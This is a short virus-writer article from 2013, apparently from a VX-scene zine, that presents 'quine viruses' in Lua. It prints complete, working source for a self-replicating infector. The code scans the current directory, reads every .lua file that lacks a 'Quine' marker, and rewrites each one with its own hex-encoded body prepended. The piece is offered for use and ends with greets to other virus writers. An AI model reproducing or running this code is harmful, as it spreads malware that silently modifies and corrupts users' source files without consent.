﻿                             Quine Viruses in Lua
                              roy g biv / defjam


What is it?

A  quine is a program which emits a copy of its own source code as its output.
We  can  make a variation of this technique to make a virus, which copies  its
own  source  code instead.  This is harder than printing itself.  The idea  is
source  code  infection,  well known for many years already, but we do  it  in
elegant form for the first time.  Here is the code:

a=""                                                   --place atoi(code,16) here first, begin with second '"'
b='a="'..a                                             --create string declaration and append atoi entire code
for c=1,string.len(a),2 do
    b=b..string.char(tonumber(string.sub(a,c,c+1),16)) --append plaintext code
end
require'lfs'
for c in lfs.dir(".")do
    if string.sub(string.lower(c),-4)==".lua"then      --find all .lua files
        d=io.open(c):read('*all')                      --read entire file
        if not string.find(d,"Quine")then              --check for infection marker
            io.open(c,"w"):write(b..d)                 --write everything
        end
    end
end
--Quine - roy g biv 08/09/13


Greets to friendly people (A-Z):

Active - Benny - herm1t - hh86 - jqwerty - Malum - Obleak - Prototype -
Ratter - Ronin - RT Fishel - sars - SPTH - The Gingerbread Man - Ultras -
uNdErX - Vallez - Vecna - Whitehead


rgb/defjam september 2013
iam_rgb@hotmail.com
